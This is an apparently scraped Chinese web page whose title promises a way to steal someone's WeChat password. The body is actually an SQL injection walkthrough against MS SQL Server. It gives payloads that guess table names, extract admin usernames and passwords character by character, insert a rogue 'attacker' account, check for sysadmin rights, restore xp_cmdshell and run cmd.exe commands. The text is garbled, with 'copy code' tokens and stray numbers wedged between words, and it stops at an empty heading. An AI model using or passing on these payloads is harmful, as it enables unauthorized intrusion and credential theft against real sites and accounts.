怎么偷上别人的微信,如何获取对方微信密码

rand_user

1.判断有无注入点
\“  ;   and 1=1    and 1=2

2.猜表一般的表的名称无非是admin adminuser user pass password 等..
and 0<>（select count（*） from *）
and 0<>（select count（*） from admin） ---判断是否存在admin这张表

3.猜帐号数目 如果遇到0< 返回正确页面 1
and 0<（select count（*） from admin）
and 1<（select count（*） from admin）

4.猜解字段名称 在len（ ） 括号里面加上我们想到的字段名称.
and 1=（select count（*） from admin where len（*）>0）--
and 1=（select count（*） from admin where len（用户字段名称name）>0）
and 1=（select count（*） from admin where len（密码字段名称password）>0）

5.猜解各个字段的长度 猜解长度就是把>0变换 直到返回正确页面为止

12345678

and 复制代码 1=（ 复制代码 select 复制代码 count 复制代码 （*） 复制代码 from 复制代码 admin 复制代码 where 复制代码 len（*）>0） 复制代码 and 复制代码 1=（ 复制代码 select 复制代码 count 复制代码 （*） 复制代码 from 复制代码 admin 复制代码 where 复制代码 len（ 复制代码 name 复制代码 ）>6） 错误 复制代码 and 复制代码 1=（ 复制代码 select 复制代码 count 复制代码 （*） 复制代码 from 复制代码 admin 复制代码 where 复制代码 len（ 复制代码 name 复制代码 ）>5） 正确 长度是6 复制代码 and 复制代码 1=（ 复制代码 select 复制代码 count 复制代码 （*） 复制代码 from 复制代码 admin 复制代码 where 复制代码 len（ 复制代码 name 复制代码 ）=6） 正确 复制代码 and 复制代码 1=（ 复制代码 select 复制代码 count 复制代码 （*） 复制代码 from 复制代码 admin 复制代码 where 复制代码 len（ 复制代码 password 复制代码 ）>11） 正确 复制代码 and 复制代码 1=（ 复制代码 select 复制代码 count 复制代码 （*） 复制代码 from 复制代码 admin 复制代码 where 复制代码 len（ 复制代码 password 复制代码 ）>12） 错误 长度是12 复制代码 and 复制代码 1=（ 复制代码 select 复制代码 count 复制代码 （*） 复制代码 from 复制代码 admin 复制代码 where 复制代码 len（ 复制代码 password 复制代码 ）=12） 正确 复制代码

6.猜解字符

12

and 复制代码 1=（ 复制代码 select 复制代码 count 复制代码 （*） 复制代码 from 复制代码 admin 复制代码 where 复制代码 left 复制代码 （ 复制代码 name 复制代码 ,1）= 复制代码 \“a\“ 复制代码 ） 复制代码 ---猜解用户帐号的第一位 复制代码 and 复制代码 1=（ 复制代码 select 复制代码 count 复制代码 （*） 复制代码 from 复制代码 admin 复制代码 where 复制代码 left 复制代码 （ 复制代码 name 复制代码 ,2）= 复制代码 \“ab\“ 复制代码 ） 复制代码 ---猜解用户帐号的第二位 复制代码

就这样一次加一个字符这样猜,猜到够你刚才猜出来的多少位了就对了,帐号就算出来了

1	and 复制代码 1=（ 复制代码 select 复制代码 top 复制代码 1 复制代码 count 复制代码 （*） 复制代码 from 复制代码 Admin 复制代码 where 复制代码 Asc 复制代码 （mid（pass,5,1））=51） 复制代码 -- 复制代码

这个查询语句可以猜解中文的用户和密码.只要把后面的数字换成中文的ASSIC码就OK.最后把结果再转换成字符.

123456789

\“group by users.id having 1=1-- 复制代码 \“ 复制代码 group 复制代码 by 复制代码 users.id, users.username, users. 复制代码 password 复制代码 , users.privs 复制代码 having 复制代码 1=1 复制代码 -- 复制代码 \“; insert into users values（ 666, \“ 复制代码 attacker 复制代码 \“, \“ 复制代码 foobar 复制代码 \“, 0xffff ）-- 复制代码 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=\“ 复制代码 logintable 复制代码 \“- 复制代码 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=\“ 复制代码 logintable 复制代码 \“ WHERE COLUMN_NAME NOT IN （\“ 复制代码 login_id 复制代码 \“）- 复制代码 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=\“ 复制代码 logintable 复制代码 \“ WHERE COLUMN_NAME NOT IN （\“ 复制代码 login_id 复制代码 \“,\“ 复制代码 login_name 复制代码 \“）- 复制代码 UNION SELECT TOP 1 login_name FROM logintable- 复制代码 UNION SELECT TOP 1 password FROM logintable where login_name=\“ 复制代码 Rahul\“ 复制代码 -- 复制代码

看服务器打的补丁=出错了打了SP4补丁

1	and 复制代码 1=（ 复制代码 select 复制代码 @@VERSION） 复制代码 -- 复制代码

看数据库连接账号的权限，返回正常，证明是服务器角色sysadmin权限。
and 1=（SELECT IS_SRVROLEMEMBER（\“sysadmin\“））--

判断连接数据库帐号。（采用SA账号连接 返回正常=证明了连接账号是SA）

123	and 复制代码 \“sa\“ 复制代码 =（ 复制代码 SELECT 复制代码 System_user 复制代码 ） 复制代码 -- 复制代码 and 复制代码 user_name（）= 复制代码 \“dbo\“ 复制代码 -- 复制代码 and 复制代码 0<>（ 复制代码 select 复制代码 user_name（） 复制代码 -- 复制代码

看xp_cmdshell是否删除

1	and 复制代码 1=（ 复制代码 SELECT 复制代码 count 复制代码 （*） 复制代码 FROM 复制代码 master.dbo.sysobjects 复制代码 WHERE 复制代码 xtype = 复制代码 \“X\“ 复制代码 AND 复制代码 name 复制代码 = 复制代码 \“xp_cmdshell\“ 复制代码 ） 复制代码 -- 复制代码

xp_cmdshell被删除，恢复,支持绝对路径的恢复

12	; 复制代码 EXEC 复制代码 master.dbo.sp_addextendedproc 复制代码 \“xp_cmdshell\“ 复制代码 , 复制代码 \“xplog70.dll\“ 复制代码 -- 复制代码 ; 复制代码 EXEC 复制代码 master.dbo.sp_addextendedproc 复制代码 \“xp_cmdshell\“ 复制代码 , 复制代码 \“c:\inetpub\wwwroot\xplog70.dll\“ 复制代码 -- 复制代码

反向PING自己实验

1	;use master; 复制代码 declare 复制代码 @s 复制代码 int 复制代码 ; 复制代码 exec 复制代码 sp_oacreate 复制代码 “wscript.shell“ 复制代码 ,@s 复制代码 out 复制代码 ; 复制代码 exec 复制代码 sp_oamethod @s, 复制代码 “run“ 复制代码 , 复制代码 NULL 复制代码 , 复制代码 “cmd.exe /c ping 192.168.0.1“ 复制代码 ; 复制代码 -- 复制代码

加帐号





（责任编辑：网络）